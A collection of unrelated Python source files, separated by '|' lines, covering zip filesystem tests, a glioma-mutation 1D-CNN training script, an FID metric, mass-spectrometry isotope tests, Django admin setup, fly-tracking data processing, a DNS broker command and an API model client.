self.assertEqual(f.read1(), b"a" * 50000)
with self.fs.openbin("test.bin") as f:
self.assertEqual(f.read1(50000), b"a" * 50000)
def test_getinfo(self):
super(TestReadZipFS, self).test_getinfo()
top = self.fs.getinfo("top.txt", ["zip"])
if sys.platform in ("linux", "darwin"):
self.assertEqual(top.get("zip", "create_system"), 3)
def test_openbin(self):
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.name, "top.txt")
with self.fs.openbin("top.txt") as f:
self.assertRaises(ValueError, f.seek, -2, Seek.set)
with self.fs.openbin("top.txt") as f:
self.assertRaises(ValueError, f.seek, 2, Seek.end)
with self.fs.openbin("top.txt") as f:
self.assertRaises(ValueError, f.seek, 0, 5)
def test_read(self):
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.read(), b"Hello, World")
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.read(5), b"Hello")
self.assertEqual(f.read(7), b", World")
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.read(12), b"Hello, World")
def test_read1(self):
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.read1(), b"Hello, World")
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.read1(5), b"Hello")
self.assertEqual(f.read1(7), b", World")
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.read1(12), b"Hello, World")
def test_seek_set(self):
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(), b"Hello, World")
self.assertEqual(f.tell(), 12)
self.assertEqual(f.read(), b"")
self.assertEqual(f.tell(), 12)
self.assertEqual(f.seek(0), 0)
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read1(), b"Hello, World")
self.assertEqual(f.tell(), 12)
self.assertEqual(f.seek(1), 1)
self.assertEqual(f.tell(), 1)
self.assertEqual(f.read(), b"ello, World")
self.assertEqual(f.tell(), 12)
self.assertEqual(f.seek(7), 7)
self.assertEqual(f.tell(), 7)
self.assertEqual(f.read(), b"World")
self.assertEqual(f.tell(), 12)
def test_seek_current(self):
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.tell(), 0)
self.assertEqual(f.read(5), b"Hello")
self.assertEqual(f.tell(), 5)
self.assertEqual(f.seek(2, Seek.current), 7)
self.assertEqual(f.read1(), b"World")
self.assertEqual(f.tell(), 12)
self.assertEqual(f.seek(-1, Seek.current), 11)
self.assertEqual(f.read(), b"d")
with self.fs.openbin("top.txt") as f:
self.assertRaises(ValueError, f.seek, -1, Seek.current)
def test_seek_end(self):
with self.fs.openbin("top.txt") as f:
self.assertEqual(f.tell(), 0)
self.assertEqual(f.seek(-12, Seek.end), 0)
self.assertEqual(f.read1(5), b"Hello")
self.assertEqual(f.seek(-7, Seek.end), 5)
self.assertEqual(f.seek(-5, Seek.end), 7)
self.assertEqual(f.read(), b"World")
class TestReadZipFSMem(TestReadZipFS):
def make_source_fs(self):
return open_fs("mem://")
class TestDirsZipFS(unittest.TestCase):
def test_implied(self):
"""Test zipfs creates intermediate directories."""
fh, path = tempfile.mkstemp("testzip.zip")
try:
os.close(fh)
with zipfile.ZipFile(path, mode="w") as z:
z.writestr("foo/bar/baz/egg", b"hello")
with zipfs.ReadZipFS(path) as zip_fs:
foo = zip_fs.getinfo("foo", ["details"])
bar = zip_fs.getinfo("foo/bar")
baz = zip_fs.getinfo("foo/bar/baz")
self.assertTrue(foo.is_dir)
self.assertTrue(zip_fs.isfile("foo/bar/baz/egg"))
finally:
os.remove(path)
class TestOpener(unittest.TestCase):
def test_not_writeable(self):
with self.assertRaises(NotWriteable):
open_fs("zip://foo.zip", writeable=True)
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Thu Dec 3 10:07:36 2020
This script is for detection IDH and TERTp mutation in gliomas.
1D-CNN is the approach that we use in this study.
This study was submitted to ISMRM 2021
Abdullah BAS
abdullah.bas@boun.edu.tr
BME Bogazici University
Istanbul / Uskudar
@author: abas
"""
from __future__ import print_function
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
from torchvision import datasets, transforms
import numpy as np
import optuna
import exceLoader
import config
from matplotlib import pyplot as plt
from torch.utils.data import Dataset, DataLoader
from model1DCNN import Net
device=config.device
def get_data_loaders(train_batch_size, test_batch_size):
""" This function is for initializing data_loaders
Args:
train_batch_size (int): Can be manipulated from config.py
test_batch_size (int): Can be manipulated from config.py
Returns:
dataloaders: Returns train and test dataloaders.
"""
#load=exceLoaderTERT.dataset('fit2.xlsx',preprocess=False)
#load_test=exceLoaderTERT.dataset('fit2.xlsx',phase='test',preprocess=False)
load=exceLoader.dataset(config.train_path,responseCol=820,preprocess=True) # defining the dataloaders training
load_test=exceLoader.dataset(config.test_path,responseCol=820,preprocess=True,phase='test') # defining the dataloaders test
train_loader=DataLoader(load,batch_size=train_batch_size,shuffle=True) # creating data_loader from dataset
test_loader = DataLoader(load_test, batch_size=test_batch_size,
shuffle=False) # creating data_loader from dataset
return train_loader, test_loader
def train(log_interval, model, train_loader, optimizer, epoch):
"""This is for training loop of optuna
Args:
log_interval (int): Logging interval
model (torch model): 1D-CNN model that we created by using model1DCNN.py
train_loader (dataloader): train data_loader for training
optimizer (torch.optimizer): you can select the optimizer
epoch (int): Epoch number
Returns:
[float]: Returns training loss
"""
model.train()
losses=[]
for batch_idx, (age,data, target) in enumerate(train_loader):
optimizer.zero_grad()
output = model(data.to(device),age.to(device)) # model prediction
criterion = nn.CrossEntropyLoss() # loss function
loss=criterion(output, target.to(device))# computing the loss
loss.backward() # backpropogation
optimizer.step() # optimize
losses.append(loss.item()) # listing loss
if batch_idx % log_interval == 0:
print('Train Epoch: {} [{}/{} ({:.0f}%)]\tLoss: {:.6f}'.format(
epoch, batch_idx * len(data), len(train_loader.dataset),
100. * batch_idx / len(train_loader), loss.item()))
return losses # returning the losses
def test(model, test_loader):
""" Testing loop for optuna
Args:
model (torch.model): model to input
test_loader (dataloader): dataloader for testing
Returns:
accuracy [float]: accuracy
acc1 [float]: accuracy of class1
acc2 [float]: accuracy of class2
losses [list]: loss list
"""
model.eval()
test_loss = 0 # initializing the required variables
correct = 0
num_classes=[0,0]
num_samples=[0,0]
losses=[]
with torch.no_grad():
for age, data, target in test_loader:
output = model(data.to(device),age.to(device))
criterion = nn.CrossEntropyLoss()
test_loss=criterion(output, target.to(device)) # sum up batch loss
pred = output.argmax(dim=1, keepdim=True) # get the index of the max log-probability
losses.append(test_loss)
for i,_ in enumerate(pred):
if pred[i]==target[i]:
num_classes[target[i]]+=1
num_samples[target[i]]+=1
correct += pred.eq(target.to(device).view_as(pred)).sum().item()
accuracy = 100. * correct / len(test_loader.dataset) # computing the accuracy
acc1=100.*num_classes[0]/num_samples[0] # computing the class-wise accuracies
acc2=100.*num_classes[1]/num_samples[1]
print('\nTest set: Average loss: {:.4f}, Accuracy: {}/{} ({:.0f}%)\n'.format(
test_loss, correct, len(test_loader.dataset),
100. * correct / len(test_loader.dataset)))
print(f'Acc1:{acc1}/{num_samples[0]} , Acc2:{acc2}/{num_samples[1]}')
return accuracy,acc1,acc2,losses
def train_optuna(trial):
"""This function is for optimizing the hyperparameters.
Args:
trial (optuna.study): This comes from optuna. Initialized study
Returns:
test_loss [float]: Test loss value. In this study optuna tries to minimize this value.
"""
global best_booster # to find best model to save
# creating the optimization parameters.
# manipulation can be done with changing cfg parameters
cfg = { 'device' : config.device,
'train_batch_size' : config.train_batch_size,
'test_batch_size' : config.test_batch_size,
'n_epochs' :trial.suggest_categorical('epochs',[50,60,100,500]),
'seed' : config.seed,
'log_interval' : 1,
'save_model' : False,
'lr' : trial.suggest_loguniform('lr', 1e-5, 1e-2),
'momentum': trial.suggest_uniform('momentum', 0.1, 0.99),
'optimizer': trial.suggest_categorical('optimizer',[optim.SGD, optim.RMSprop]),
'activation': trial.suggest_categorical('activation',[F.relu,F.sigmoid,F.leaky_relu])}
torch.manual_seed(cfg['seed']) # for reproducibility
train_loader, test_loader = get_data_loaders(cfg['train_batch_size'], cfg['test_batch_size'])
model = Net(cfg['activation']).to(device) # model defining
optimizer = cfg['optimizer'](model.parameters(), lr=cfg['lr']) # optimizer defining
losses_train=[]
losses_test=[]
accuracies=[]
for epoch in range(1, cfg['n_epochs'] + 1):
loss_train=train(cfg['log_interval'], model, train_loader, optimizer, epoch) # function train
test_accuracy,acc1,acc2,test_loss = test(model, test_loader) # function test
losses_train.append(loss_train)
losses_test.append(test_loss)
tester=test_accuracy
accuracies.append(test_accuracy)
if test_loss[0]<best_booster:
# checkpoint is for loading and saving the hyperparameters
checkpoint = {'model': Net(cfg['activation']),
'state_dict': model.state_dict(),
'optimizer' : optimizer.state_dict(),
'epochs':epoch,
'activation':cfg['activation'],
'lr':cfg['lr'],
'batch_size':cfg['train_batch_size'],
'acc1': acc1,
'acc2':acc2,
'optimizerName':cfg['optimizer'],
'test_loss':losses_test,
'train_loss':losses_train,
'accuracies': accuracies
}
torch.save(checkpoint, f'{config.output}/PRTERT_Mut_{test_accuracy}.pth') # saving the model parameters
best_booster=test_loss[0]
return test_loss[0]
best_booster=110
if __name__ == '__main__':
sampler = optuna.samplers.TPESampler()
study = optuna.create_study(sampler=sampler, direction='minimize') # loss value is the value that we want to minimize
study.optimize(func=train_optuna, n_trials=50)
df=study.trials_dataframe() # converting study to dataframe
study.best_trial
optuna.visualization.plot_parallel_coordinate(study,params=['lr','momentum']) # plotting the parameters using paralel plot
|
import numpy as np
import torch
import torch.nn as nn
from scipy import linalg
from tqdm import tqdm
from basicsr.archs.inception import InceptionV3
def load_patched_inception_v3(device='cuda',
resize_input=True,
normalize_input=False):
# we may not resize the input, but in [rosinality/stylegan2-pytorch] it
# does resize the input.
inception = InceptionV3([3],
resize_input=resize_input,
normalize_input=normalize_input)
inception = nn.DataParallel(inception).eval().to(device)
return inception
@torch.no_grad()
def extract_inception_features(data_generator,
inception,
len_generator=None,
device='cuda'):
"""Extract inception features.
Args:
data_generator (generator): A data generator.
inception (nn.Module): Inception model.
len_generator (int): Length of the data_generator to show the
progressbar. Default: None.
device (str): Device. Default: cuda.
Returns:
Tensor: Extracted features.
"""
if len_generator is not None:
pbar = tqdm(total=len_generator, unit='batch', desc='Extract')
else:
pbar = None
features = []
for data in data_generator:
if pbar:
pbar.update(1)
data = data.to(device)
feature = inception(data)[0].view(data.shape[0], -1)
features.append(feature.to('cpu'))
if pbar:
pbar.close()
features = torch.cat(features, 0)
return features
def calculate_fid(mu1, sigma1, mu2, sigma2, eps=1e-6):
"""Numpy implementation of the Frechet Distance.
The Frechet distance between two multivariate Gaussians X_1 ~ N(mu_1, C_1)
and X_2 ~ N(mu_2, C_2) is
d^2 = ||mu_1 - mu_2||^2 + Tr(C_1 + C_2 - 2*sqrt(C_1*C_2)).
Stable version by Dougal J. Sutherland.
Args:
mu1 (np.array): The sample mean over activations.
sigma1 (np.array): The covariance matrix over activations for
generated samples.
mu2 (np.array): The sample mean over activations, precalculated on an
representative data set.
sigma2 (np.array): The covariance matrix over activations,
precalculated on an representative data set.
Returns:
float: The Frechet Distance.
"""
assert mu1.shape == mu2.shape, 'Two mean vectors have different lengths'
assert sigma1.shape == sigma2.shape, (
'Two covariances have different dimensions')
cov_sqrt, _ = linalg.sqrtm(sigma1 @ sigma2, disp=False)
# Product might be almost singular
if not np.isfinite(cov_sqrt).all():
print('Product of cov matrices is singular. Adding {eps} to diagonal '
'of cov estimates')
offset = np.eye(sigma1.shape[0]) * eps
cov_sqrt = linalg.sqrtm((sigma1 + offset) @ (sigma2 + offset))
# Numerical error might give slight imaginary component
if np.iscomplexobj(cov_sqrt):
if not np.allclose(np.diagonal(cov_sqrt).imag, 0, atol=1e-3):
m = np.max(np.abs(cov_sqrt.imag))
raise ValueError(f'Imaginary component {m}')
cov_sqrt = cov_sqrt.real
mean_diff = mu1 - mu2
mean_norm = mean_diff @ mean_diff
trace = np.trace(sigma1) + np.trace(sigma2) - 2 * np.trace(cov_sqrt)
fid = mean_norm + trace
return fid
|
import unittest
from brainpy import IsotopicDistribution, isotopic_variants, calculate_mass, neutral_mass, _has_c, Peak
if _has_c:
from brainpy.brainpy import _IsotopicDistribution
class TestIsotopicDistribution(unittest.TestCase):
def test_neutral_mass(self):
hexnac = {'H': 13, 'C': 8, 'O': 5, 'N': 1}
dist = isotopic_variants(hexnac)
reference = [
Peak(mz=203.079373, intensity=0.901867, charge=0),
Peak(mz=204.082545, intensity=0.084396, charge=0),
Peak(mz=205.084190, intensity=0.012787, charge=0),
Peak(mz=206.086971, intensity=0.000950, charge=0)
]
for inst, ref in zip(dist, reference):
self.assertAlmostEqual(inst.mz, ref.mz, 3)
self.assertAlmostEqual(inst.intensity, ref.intensity, 3)
if _has_c:
def test_pure_python(self):
hexnac = {'H': 13, 'C': 8, 'O': 5, 'N': 1}
dist = _IsotopicDistribution(hexnac, 4).aggregated_isotopic_variants()
reference = [
Peak(mz=203.079373, intensity=0.901867, charge=0),
Peak(mz=204.082545, intensity=0.084396, charge=0),
Peak(mz=205.084190, intensity=0.012787, charge=0),
Peak(mz=206.086971, intensity=0.000950, charge=0)
]
for inst, ref in zip(dist, reference):
self.assertAlmostEqual(inst.mz, ref.mz, 3)
self.assertAlmostEqual(inst.intensity, ref.intensity, 3)
if __name__ == '__main__':
unittest.main()
|
# Remove() -> Remove o primeiro elemento encontrado pelo valor específicado.
lista_4 = [10,9,8,7,5,6,4,2,3,1,2,3]
print(lista_4)
lista_4.remove(2)
print(lista_4)
|
from django.contrib import admin
from .models import WhatsappChatMessages, WhatsappMediaMessages
admin.site.register(WhatsappChatMessages)
admin.site.register(WhatsappMediaMessages) |
#!/usr/bin/python
from __future__ import print_function
import roslib; roslib.load_manifest('faa_data_processing')
import rospy
import argparse
import os
import numpy
import numpy.lib.recfunctions as recfunctions
import csv
from faa_utilities import FindData
from faa_utilities import FileTools
FILE_TOOLS = FileTools()
class TrackingDataProcessor(object):
def __init__(self,overwrite=False):
self.overwrite = overwrite
self.fd = FindData(overwrite=overwrite)
def find_and_process_data(self,directory):
paths = self.find_data(directory)
self.process_data(paths)
def find_data(self,directory):
return self.fd.find_tracking_data(directory)
def process_data(self,paths):
for path in paths:
print("Processing data in {0}".format(path))
numpy_data = FILE_TOOLS.load_numpy_data(path)
tracking_data = self.remove_pre_trial_data(numpy_data)
# header: time_secs,time_nsecs,status,tunnel,enabled,gate0,gate1,gate2,fly_x,fly_y,fly_angle,chamber,blob_x,blob_y,blob_area,blob_slope,blob_ecc
normalized_data = self.normalize_data(tracking_data)
filtered_data = self.filter_data(normalized_data)
raw_walkway_data = self.get_raw_walkway_data(filtered_data)
raw_chamber_data = self.get_raw_chamber_data(filtered_data)
self.write_data(path,FILE_TOOLS.raw_prefix+FILE_TOOLS.walkway_prefix,raw_walkway_data)
self.write_data(path,FILE_TOOLS.raw_prefix+FILE_TOOLS.chamber_prefix,raw_chamber_data)
analyzed_walkway_data = self.analyze_data(raw_walkway_data)
self.write_data(path,FILE_TOOLS.analyzed_prefix+FILE_TOOLS.walkway_prefix,analyzed_walkway_data)
summarized_walkway_data = self.summarize_data(analyzed_walkway_data)
self.write_data(path,FILE_TOOLS.summarized_prefix+FILE_TOOLS.walkway_prefix,summarized_walkway_data)
analyzed_chamber_data = self.analyze_chamber_data(raw_chamber_data)
self.write_data(path,FILE_TOOLS.analyzed_prefix+FILE_TOOLS.chamber_prefix,analyzed_chamber_data)
summarized_chamber_data = self.summarize_chamber_data(analyzed_chamber_data)
self.write_data(path,FILE_TOOLS.summarized_prefix+FILE_TOOLS.chamber_prefix,summarized_chamber_data)
def remove_pre_trial_data(self,tracking_data):
indicies = tracking_data['status'] != 'Wait in Start'
tracking_data = tracking_data[indicies]
return tracking_data
def normalize_data(self,tracking_data):
time_secs = numpy.float64(tracking_data['time_secs'])
time_secs -= time_secs[0]
time_nsecs = numpy.float64(tracking_data['time_nsecs'])*10**(-9)
time_nsecs -= time_nsecs[0]
time_rel = time_secs + time_nsecs
names = list(tracking_data.dtype.names)
norm_data = tracking_data[names]
norm_data = recfunctions.append_fields(norm_data,'time_rel',time_rel,dtypes=numpy.float64,usemask=False)
# frame = numpy.uint32(tracking_data['frame'])
# frame -= frame[0]
# names = list(tracking_data.dtype.names)
# names.remove('time_secs')
# names.remove('time_nsecs')
# names.remove('frame')
# norm_data = tracking_data[names]
# norm_data = recfunctions.append_fields(norm_data,'time',time,dtypes=numpy.float64,usemask=False)
# norm_data = recfunctions.append_fields(norm_data,'frame',frame,dtypes=numpy.uint16,usemask=False)
return norm_data
def filter_data(self,normalized_data):
tunnels = set(normalized_data['tunnel'])
indicies = None
for tunnel in tunnels:
tunnel_data = normalized_data[normalized_data['tunnel']==tunnel]
enabled = tunnel_data['enabled'] == 'True'
if numpy.all(enabled):
if indicies is not None:
indicies |= normalized_data['tunnel'] == tunnel
else:
indicies = normalized_data['tunnel'] == tunnel
indicies &= normalized_data['chamber'] != ''
indicies &= normalized_data['blob_ecc'] != '0.0'
filtered_data = normalized_data[indicies]
return filtered_data
def get_raw_walkway_data(self,filtered_data):
# walkway_dtype = numpy.dtype([('time_secs', '<u4'),
# ('time_nsecs', '<u4'),
# ('time_rel', '<f4'),
# ('tunnel', '<u2'),
# ('fly_x', '<f4'),
# ('fly_y', '<f4'),
# ('fly_angle', '<f4'),
# ])
header = list(FILE_TOOLS.walkway_dtype.names)
walkway_data = filtered_data[filtered_data['status'] == 'Walk To End']
walkway_data = walkway_data[walkway_data['gate1'] != 'close']
walkway_data = walkway_data[header]
walkway_data = walkway_data.astype(FILE_TOOLS.walkway_dtype)
walkway_data['tunnel'] = walkway_data['tunnel']+1
return walkway_data
def get_raw_chamber_data(self,filtered_data):
# chamber_dtype = numpy.dtype([('time_secs', '<u4'),
# ('time_nsecs', '<u4'),
# ('time_rel', '<f4'),
# ('status', '|S25'),
# ('tunnel', '<u2'),
# ('fly_x', '<f4'),
# ('fly_y', '<f4'),
# ('fly_angle', '<f4'),
# ])
header = list(FILE_TOOLS.chamber_dtype.names)
tracking_chamber_data = filtered_data[filtered_data['status'] != 'Walk To End']
tracking_chamber_data = tracking_chamber_data[header]
tracking_chamber_data = tracking_chamber_data.astype(FILE_TOOLS.chamber_dtype)
tracking_chamber_data['tunnel'] = tracking_chamber_data['tunnel']+1
indicies = tracking_chamber_data['status'] == 'End Chamber Ethanol'
raw_chamber_data_ethanol = tracking_chamber_data[indicies]
raw_chamber_data_ethanol = recfunctions.drop_fields(raw_chamber_data_ethanol,
'status',
usemask=False)
status_array = numpy.array(['Ethanol']*len(raw_chamber_data_ethanol),dtype='|S25')
raw_chamber_data_ethanol = recfunctions.append_fields(raw_chamber_data_ethanol,
'status',
status_array,
dtypes='|S25',
usemask=False)
raw_chamber_data = raw_chamber_data_ethanol
ethanol_start_time = raw_chamber_data_ethanol['time_rel'][0]
indicies = tracking_chamber_data['status'] == 'End Chamber Air'
indicies &= tracking_chamber_data['time_rel'] < ethanol_start_time
raw_chamber_data_air_before = tracking_chamber_data[indicies]
raw_chamber_data_air_before = recfunctions.drop_fields(raw_chamber_data_air_before,
'status',
usemask=False)
status_array = numpy.array(['AirBefore']*len(raw_chamber_data_air_before),dtype='|S25')
raw_chamber_data_air_before = recfunctions.append_fields(raw_chamber_data_air_before,
'status',
status_array,
dtypes='|S25',
usemask=False)
raw_chamber_data = recfunctions.stack_arrays((raw_chamber_data_air_before,raw_chamber_data),usemask=False)
indicies = tracking_chamber_data['status'] == 'End Chamber Air'
indicies &= tracking_chamber_data['time_rel'] > ethanol_start_time
raw_chamber_data_air_after = tracking_chamber_data[indicies]
raw_chamber_data_air_after = recfunctions.drop_fields(raw_chamber_data_air_after,
'status',
usemask=False)
status_array = numpy.array(['AirAfter']*len(raw_chamber_data_air_after),dtype='|S25')
raw_chamber_data_air_after = recfunctions.append_fields(raw_chamber_data_air_after,
'status',
status_array,
dtypes='|S25',
usemask=False)
raw_chamber_data = recfunctions.stack_arrays((raw_chamber_data,raw_chamber_data_air_after),usemask=False)
return raw_chamber_data
def write_data_to_file(self,path,data):
header = list(data.dtype.names)
fid = open(path, "w")
data_writer = csv.writer(fid, delimiter=",")
data_writer.writerow(header)
data_writer.writerows(data)
fid.close()
def write_data(self,path,prefix,data):
(dir,file) = os.path.split(path)
if file.startswith(FILE_TOOLS.tracking_prefix):
data_file = file.replace(FILE_TOOLS.tracking_prefix,prefix)
data_path = os.path.join(dir,data_file)
if os.path.exists(data_path) and not self.overwrite:
print("Data file already exists!")
return
else:
return
print("Writing new data file")
data_file_name = file.replace(FILE_TOOLS.tracking_prefix,prefix)
data_path = os.path.join(dir,data_file_name)
self.write_data_to_file(data_path,data)
def analyze_data(self,raw_data):
initialized = False
tunnels = set(raw_data['tunnel'])
for tunnel in tunnels:
tunnel_data_raw = raw_data[raw_data['tunnel']==tunnel]
time_rel = tunnel_data_raw['time_rel']
delta_time = numpy.diff(time_rel)
tunnel_array = numpy.ones(len(delta_time),dtype=numpy.uint16)*tunnel
tunnel_array.dtype = numpy.dtype([('tunnel','<u2')])
tunnel_data_analyzed = tunnel_array
fly_x = tunnel_data_raw['fly_x']
delta_fly_x = numpy.diff(fly_x)
fly_y = tunnel_data_raw['fly_y']
delta_fly_y = numpy.diff(fly_y)
distance = numpy.sqrt(numpy.square(delta_fly_x)+numpy.square(delta_fly_y))
velocity = distance/delta_time
fly_angle = tunnel_data_raw['fly_angle']
delta_fly_angle = numpy.abs(numpy.diff(fly_angle))
flipped = 180 - delta_fly_angle
flipped_is_less = flipped < delta_fly_angle
delta_fly_angle[flipped_is_less] = flipped[flipped_is_less]
angular_velocity = delta_fly_angle/delta_time
time_secs = tunnel_data_raw['time_secs'][:-1]
time_nsecs = tunnel_data_raw['time_nsecs'][:-1]
names = ['time_secs','time_nsecs']
tunnel_data_seq = [time_secs,time_nsecs]
tunnel_data_analyzed = recfunctions.append_fields(tunnel_data_analyzed,
names,
tunnel_data_seq,
dtypes=numpy.uint64,
usemask=False)
names = ['delta_time','delta_fly_x','delta_fly_y','distance','velocity','delta_fly_angle','angular_velocity']
tunnel_data_seq = [delta_time,delta_fly_x,delta_fly_y,distance,velocity,delta_fly_angle,angular_velocity]
tunnel_data_analyzed = recfunctions.append_fields(tunnel_data_analyzed,
names,
tunnel_data_seq,
dtypes=numpy.float32,
usemask=False)
if initialized:
analyzed_data = recfunctions.stack_arrays((analyzed_data,tunnel_data_analyzed),usemask=False)
else:
analyzed_data = tunnel_data_analyzed
initialized = True
return analyzed_data
def analyze_chamber_data(self,raw_chamber_data):
ethanol_data = raw_chamber_data[raw_chamber_data['status']=='Ethanol']
analyzed_ethanol_data = self.analyze_data(ethanol_data)
status_array = numpy.array(['Ethanol']*len(analyzed_ethanol_data),dtype='|S25')
analyzed_chamber_data = recfunctions.append_fields(analyzed_ethanol_data,
'status',
status_array,
dtypes='|S25',
usemask=False)
air_before_data = raw_chamber_data[raw_chamber_data['status']=='AirBefore']
if air_before_data.size != 0:
analyzed_air_before_data = self.analyze_data(air_before_data)
status_array = numpy.array(['AirBefore']*len(analyzed_air_before_data),dtype='|S25')
analyzed_air_before_data = recfunctions.append_fields(analyzed_air_before_data,
'status',
status_array,
dtypes='|S25',
usemask=False)
analyzed_chamber_data = recfunctions.stack_arrays((analyzed_air_before_data,analyzed_chamber_data),usemask=False)
air_after_data = raw_chamber_data[raw_chamber_data['status']=='AirAfter']
if air_after_data.size != 0:
analyzed_air_after_data = self.analyze_data(air_after_data)
status_array = numpy.array(['AirAfter']*len(analyzed_air_after_data),dtype='|S25')
analyzed_air_after_data = recfunctions.append_fields(analyzed_air_after_data,
'status',
status_array,
dtypes='|S25',
usemask=False)
analyzed_chamber_data = recfunctions.stack_arrays((analyzed_chamber_data,analyzed_air_after_data),usemask=False)
return analyzed_chamber_data
def summarize_data(self,analyzed_data):
initialized = False
tunnels = set(analyzed_data['tunnel'])
for tunnel in tunnels:
tunnel_data_analyzed = analyzed_data[analyzed_data['tunnel']==tunnel]
tunnel_array = numpy.ones(1,dtype=numpy.uint16)*tunnel
tunnel_array.dtype = numpy.dtype([('tunnel','<u2')])
tunnel_data_summarized = tunnel_array
delta_time = tunnel_data_analyzed['delta_time']
total_time = delta_time.sum()
distance = tunnel_data_analyzed['distance']
total_distance = distance.sum()
velocity = tunnel_data_analyzed['velocity']
mean_velocity = velocity.mean()
angular_velocity = tunnel_data_analyzed['angular_velocity']
mean_angular_velocity = angular_velocity.mean()
names = ['total_time','total_distance','mean_velocity','mean_angular_velocity']
tunnel_data_seq = [total_time,total_distance,mean_velocity,mean_angular_velocity]
tunnel_data_summarized = recfunctions.append_fields(tunnel_data_summarized,
names,
tunnel_data_seq,
dtypes=numpy.float32,
usemask=False)
if initialized:
summarized_data = recfunctions.stack_arrays((summarized_data,tunnel_data_summarized),usemask=False)
else:
summarized_data = tunnel_data_summarized
initialized = True
return summarized_data
def summarize_chamber_data(self,analyzed_chamber_data):
summarized_total_data = self.summarize_data(analyzed_chamber_data)
status_array = numpy.array(['Total']*len(summarized_total_data),dtype='|S25')
summarized_chamber_data = recfunctions.append_fields(summarized_total_data,
'status',
status_array,
dtypes='|S25',
usemask=False)
air_before_data = analyzed_chamber_data[analyzed_chamber_data['status']=='AirBefore']
if air_before_data.size != 0:
summarized_air_before_data = self.summarize_data(air_before_data)
status_array = numpy.array(['AirBefore']*len(summarized_air_before_data),dtype='|S25')
summarized_air_before_data = recfunctions.append_fields(summarized_air_before_data,
'status',
status_array,
dtypes='|S25',
usemask=False)
summarized_chamber_data = recfunctions.stack_arrays((summarized_chamber_data,summarized_air_before_data),usemask=False)
ethanol_data = analyzed_chamber_data[analyzed_chamber_data['status']=='Ethanol']
summarized_ethanol_data = self.summarize_data(ethanol_data)
status_array = numpy.array(['Ethanol']*len(summarized_ethanol_data),dtype='|S25')
summarized_ethanol_data = recfunctions.append_fields(summarized_ethanol_data,
'status',
status_array,
dtypes='|S25',
usemask=False)
summarized_chamber_data = recfunctions.stack_arrays((summarized_chamber_data,summarized_ethanol_data),usemask=False)
air_after_data = analyzed_chamber_data[analyzed_chamber_data['status']=='AirAfter']
if air_after_data.size != 0:
summarized_air_after_data = self.summarize_data(air_after_data)
status_array = numpy.array(['AirAfter']*len(summarized_air_after_data),dtype='|S25')
summarized_air_after_data = recfunctions.append_fields(summarized_air_after_data,
'status',
status_array,
dtypes='|S25',
usemask=False)
summarized_chamber_data = recfunctions.stack_arrays((summarized_chamber_data,summarized_air_after_data),usemask=False)
return summarized_chamber_data
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument("directory", help="Directory where tracking files are located")
parser.add_argument("-o", "--overwrite", dest='overwrite', default=False, action="store_true", help="Reanalyze all experiments and overwrite previous data (default is to only analyze new data)")
args = parser.parse_args()
tdp = TrackingDataProcessor(args.overwrite)
tdp.find_and_process_data(args.directory)
|
# -*- cpy-indent-level: 4; indent-tabs-mode: nil -*-
# ex: set expandtab softtabstop=4 shiftwidth=4:
#
# Copyright (C) 2008,2009,2010,2011,2012,2013,2016 Contributor
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from aquilon.aqdb.model import NsRecord, DnsDomain, ARecord
from aquilon.worker.broker import BrokerCommand
from aquilon.exceptions_ import NotFoundException
class CommandShowNsRecord(BrokerCommand):
required_parameters = ["dns_domain", "fqdn"]
def render(self, session, dns_domain, **kw):
dbdns = DnsDomain.get_unique(session, dns_domain, compel=True)
q = session.query(NsRecord).filter_by(dns_domain=dbdns)
dba_record = ARecord.get_unique(session, fqdn=kw['fqdn'], compel=True)
q = q.filter_by(a_record=dba_record)
ns_rec = q.all()
if not ns_rec:
raise NotFoundException(
"Could not find a dns_record for domain '%s'." % dns_domain)
return ns_rec
|
class Model(object):
'''
Subclasses must specify id_field and base_uri as class variables
'''
id_field = None
base_uri = None
def __init__(self, raw_json, client):
if not self.__class__.id_field:
raise ValueError('Cannot construct Model subclass without id_field set')
if not self.__class__.base_uri:
raise ValueError('Cannot construct Model subclass without base_uri set')
self.raw_json = raw_json
self.client = client
self.download_path = None
def __repr__(self):
return '<{} {}>'.format(self.__class__.__name__, self._id)
@property
def _id(self):
return self.raw_json.get(self.id_field)
@property
def metadata_uri(self):
return '{}/{}'.format(self.base_uri, self._id)
@property
def download_uri(self):
return '{}/download'.format(self.metadata_uri)
@property
def status(self):
return self.raw_json.get('status')
def create(self):
'''
Create (POST) a record of this resource.
'''
self.raw_json = self.client.post(self.base_uri, self.raw_json)
return self
def refresh(self, **kwargs):
'''
Refresh (GET) the resource's metadata.
'''
self.raw_json = self.client.get(self.metadata_uri, **kwargs)
return self
@classmethod
def find_by_id(cls, doc_id, client):
stub = cls({cls.id_field: doc_id}, client)
return stub.refresh()
def refresh_until_ready(self, polling_interval=10, timeout=1200):
# Timeout for 20 min because kinect/realsense are almost that slow
import time
from harrison.timer import TimeoutTimer
from bodylabs_api.exceptions import ProcessingFailed
# The first refresh will log a message if self.client.verbose
self.refresh()
with TimeoutTimer(
desc='Polling {}'.format(self),
verbose=self.client.verbose,
timeout=timeout):
while self.status != 'ready':
self.refresh(verbose=False) # no log, just the dot below
if self.status == 'pending':
if self.client.verbose:
print '.',
time.sleep(polling_interval)
elif self.status == 'failed':
raise ProcessingFailed('Artifact {} failed'.format(self))
if self.client.verbose:
print '{} is ready'.format(self)
return self
def download(self, output_path, blocking=True, **kwargs):
if blocking:
self.refresh_until_ready(**kwargs)
self.client.download(self.download_uri, output_path)
